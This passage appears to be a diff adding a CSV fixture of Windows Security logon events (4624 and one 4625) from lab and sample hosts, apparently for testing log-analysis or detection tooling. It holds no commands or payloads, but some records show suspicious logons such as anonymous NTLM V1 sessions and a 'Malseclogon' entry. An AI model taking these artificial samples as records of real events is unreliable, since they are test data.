+ Advapi
+ Negotiate
+
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1d4
+ C:\Windows\System32\services.exe
+ -
+ -
+
+"
+2022-04-26T02:17:47.059955+04:00,1650925067.059955,4624,Administrator,THREEBEESCO.COM,3,Kerberos,127.0.0.1,-,02694w-win10.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 72742
+
+
+
+
+ Security
+ 02694w-win10.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ THREEBEESCO.COM
+ 0x8a38de
+ 3
+ Kerberos
+ Kerberos
+ -
+ 35D5E180-95BD-9ED7-7EFE-C355D7215A87
+ -
+ -
+ 0
+ 0x0
+ -
+ 127.0.0.1
+ 50163
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-03-19T03:23:57.397648+04:00,1552951437.397648,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 565611
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ WIN-77LTAPHIQ1R$
+ EXAMPLE
+ 0x15e25f
+ 3
+ Kerberos
+ Kerberos
+
+ 1054A084-EFFD-F992-9C74-63873C88272E
+ -
+ -
+ 0
+ 0x0
+ -
+ fe80::79bf:8ee2:433c:2567
+ 55873
+ %%1840
+
+"
+2019-03-19T03:23:52.507387+04:00,1552951432.507387,4624,user01,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 565599
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-1587066498-1489273250-1035260531-1106
+ user01
+ EXAMPLE
+ 0x15e1a7
+ 3
+ Kerberos
+ Kerberos
+
+ 14CCCD18-A781-AC28-C773-EA57D49F4B90
+ -
+ -
+ 0
+ 0x0
+ -
+ 10.0.2.17
+ 49222
+ %%1840
+
+"
+2019-03-19T03:23:51.772355+04:00,1552951431.772355,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 565596
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ WIN-77LTAPHIQ1R$
+ EXAMPLE
+ 0x15e162
+ 3
+ Kerberos
+ Kerberos
+
+ 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C
+ -
+ -
+ 0
+ 0x0
+ -
+ fe80::79bf:8ee2:433c:2567
+ 55872
+ %%1840
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,::1,,WIN-77LTAPHIQ1R.example.corp,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 565653
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ WIN-77LTAPHIQ1R$
+ EXAMPLE
+ 0x16792b
+ 3
+ Kerberos
+ Kerberos
+
+ 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 55878
+ %%1833
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,3,Advapi,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 161473
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1009
+ svc01
+ MSEDGEWIN10
+ 0x10b6b3
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x22afa1
+ 3
+ Advapi
+ MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
+ MSEDGEWIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x140c
+ C:\Windows\System32\inetsrv\w3wp.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-05-11T21:10:10.889320+04:00,1557594610.88932,4624,IEUser,IEWIN7,9,seclogo,::1,,IEWIN7,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 18206
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0x1371b
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0x1bbdce
+ 9
+ seclogo
+ Negotiate
+
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x3c8
+ C:\Windows\System32\svchost.exe
+ ::1
+ 0
+
+"
+2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768628
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x32a0d3
+ 3
+ Kerberos
+ Kerberos
+ -
+ 6747BCF0-DBAA-F21C-878B-EB339B03FA80
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50441
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768627
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x329baa
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50443
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768622
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x320935
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50438
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768621
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x31ff89
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49707
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1843
+
+"
+2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768620
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x31ff6e
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49707
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1843
+
+"
+2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768619
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x31fb1a
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50437
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768618
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x31daf6
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50436
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137225
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x1cd964
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x1cd8f6
+ %%1843
+
+"
+2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137224
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x1cd8f6
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x1cd964
+ %%1842
+
+"
+2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137223
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x25c
+ C:\Windows\System32\services.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4625
+ 0
+ 0
+ 12544
+ 0
+ 0x8010000000000000
+
+
+ 137222
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0xc000006d
+ %%2313
+ 0xc000006a
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+
+"
+2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988550
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x568d99
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64229
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988547
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x56874b
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64227
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988544
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x5686d9
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64226
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988535
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-220106
+ samir
+ 3B
+ 0x567758
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988529
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-220106
+ samir
+ 3B
+ 0x567515
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.25
+ 50251
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988525
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x56738f
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64223
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988522
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-84104
+ 02694W-WIN10$
+ THREEBEESCO.COM
+ 0x567343
+ 3
+ Kerberos
+ Kerberos
+ -
+ 429CA5A3-EDFC-5657-17C3-C050C7B047F4
+ -
+ -
+ 0
+ 0x0
+ -
+ 172.16.66.25
+ 50250
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 772611
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ 3B
+ 0x1137987
+ 3
+ NtLmSsp
+ NTLM
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 50107
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 772609
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-5-18
+ 01566S-WIN16-IR$
+ 3B
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x244
+ C:\Windows\System32\services.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 772607
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ 3B
+ 0x1136e95
+ 3
+ NtLmSsp
+ NTLM
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 50106
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-02-13T22:04:58.363696+04:00,1550081098.363696,4624,admin01,EXAMPLE,10,User32,127.0.0.1,PC01,PC01.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 227762
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ S-1-5-21-1587066498-1489273250-1035260531-1108
+ admin01
+ EXAMPLE
+ 0x14a321
+ 10
+ User32
+ Negotiate
+ PC01
+ AF83A89C-C68A-5397-5AC6-24A0C4D2BAF6
+ -
+ -
+ 0
+ 0x4b8
+ C:\Windows\System32\winlogon.exe
+ 127.0.0.1
+ 49274
+
+"
+2019-02-13T22:04:57.462400+04:00,1550081097.4624,4624,admin01,EXAMPLE,3,NtLmSsp,-,PC02,PC01.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 227747
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-1587066498-1489273250-1035260531-1108
+ admin01
+ EXAMPLE
+ 0x148f5d
+ 3
+ NtLmSsp
+ NTLM
+ PC02
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ -
+ -
+
+"
+2019-02-13T22:04:45.905783+04:00,1550081085.905783,4624,admin01,EXAMPLE,3,NtLmSsp,-,PC02,PC01.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 227740
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-1587066498-1489273250-1035260531-1108
+ admin01
+ EXAMPLE
+ 0x14871d
+ 3
+ NtLmSsp
+ NTLM
+ PC02
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ -
+ -
+
+"
+2019-02-13T22:02:05.418087+04:00,1550080925.418087,4624,user01,EXAMPLE,7,Negotiat,-,PC01,PC01.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 227708
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ S-1-5-21-1587066498-1489273250-1035260531-1106
+ user01
+ EXAMPLE
+ 0x1414d9
+ 7
+ Negotiat
+ Negotiate
+ PC01
+ 42DAF7A9-F185-F292-0EBD-B86A26624D31
+ -
+ -
+ 0
+ 0x208
+ C:\Windows\System32\lsass.exe
+ -
+ -
+
+"
+2019-02-13T22:02:04.436676+04:00,1550080924.436676,4624,user01,EXAMPLE,11,User32,127.0.0.1,PC01,PC01.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 227701
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ S-1-5-21-1587066498-1489273250-1035260531-1106
+ user01
+ EXAMPLE
+ 0x1414c8
+ 11
+ User32
+ Negotiate
+ PC01
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x704
+ C:\Windows\System32\winlogon.exe
+ 127.0.0.1
+ 0
+
+"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 329918
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 9
+ seclogo
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ ::1
+ 0
+ %%1833
+ -
+ MalseclogonUser
+ MalseclogonDomain
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 21373
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-81107902-1099128984-1836738286-500
+ Administrator
+ WINLAB.LOCAL
+ 0x82215a
+ 3
+ Kerberos
+ Kerberos
+ -
+ 59CEFB69-4F9D-7486-C449-471E00B814E3
+ -
+ -
+ 0
+ 0x0
+ -
+ 192.168.1.219
+ 63652
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 21371
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-81107902-1099128984-1836738286-500
+ Administrator
+ WINLAB.LOCAL
+ 0x821f28
+ 3
+ Kerberos
+ Kerberos
+ -
+ 59CEFB69-4F9D-7486-C449-471E00B814E3
+ -
+ -
+ 0
+ 0x0
+ -
+ 192.168.1.219
+ 63652
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 21369
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-81107902-1099128984-1836738286-500
+ Administrator
+ WINLAB.LOCAL
+ 0x821aab
+ 3
+ Kerberos
+ Kerberos
+ -
+ 59CEFB69-4F9D-7486-C449-471E00B814E3
+ -
+ -
+ 0
+ 0x0
+ -
+ 192.168.1.219
+ 63652
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 21367
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
